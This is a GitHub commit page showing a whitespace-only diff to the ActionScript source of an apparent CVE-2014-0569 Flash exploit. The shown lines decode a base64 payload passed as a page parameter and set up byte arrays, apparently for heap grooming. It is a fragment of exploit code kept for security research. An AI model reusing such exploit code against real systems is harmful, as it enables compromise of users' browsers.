We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent d78d04e commit da36291Copy full SHA for da36291
external/source/exploits/CVE-2014-0569/Main.as
@@ -31,13 +31,12 @@ package
31
{
32
var i:uint = 0
33
var j:uint = 0
34
-
+
35
var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
36
- var pattern:RegExp = / /g;
37
- b64_payload = b64_payload.replace(pattern, "+")
38
- b64.decode(b64_payload)
39
- payload = b64.toByteArray().toString()
40
+ var pattern:RegExp = / /g;
+ b64_payload = b64_payload.replace(pattern, "+")
+ b64.decode(b64_payload)
+ payload = b64.toByteArray().toString()
41
for (i = 0; i < defrag.length; i++) {
42
defrag[i] = new ByteArray()
43
defrag[i].length = BYTE_ARRAY_SIZE
0 commit comments